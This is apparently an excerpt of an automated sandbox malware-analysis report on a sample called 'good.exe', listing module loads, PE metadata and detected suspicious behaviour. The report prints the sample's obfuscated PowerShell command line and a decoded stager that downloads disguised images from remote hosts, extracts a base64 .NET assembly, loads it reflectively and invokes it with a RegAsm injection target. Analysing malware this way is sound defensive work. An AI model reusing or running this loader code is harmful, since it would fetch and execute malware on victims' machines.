                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: good.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: good.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: good.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: good.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: good.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: good.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: good.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: good.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: good.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: wextract.pdb source: good.exe
                    Source: Binary string: wextract.pdbGCTL source: good.exe
                    Source: Binary string: wkernel32.pdb source: fontdrvhost.exe, 0000000C.00000003.2007870873.0000000005240000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007716394.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdb source: fontdrvhost.exe, 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: fontdrvhost.exe, 0000000C.00000003.2005726658.0000000005310000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2005425038.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2006376240.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007391915.00000000052C0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2005726658.0000000005310000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2005425038.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: fontdrvhost.exe, 0000000C.00000003.2006376240.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007391915.00000000052C0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2007870873.0000000005240000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007716394.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: good.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: good.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: good.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: good.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: good.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    barindex
                    Found suspicious powershell code related to unpacking or dynamic code loading
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@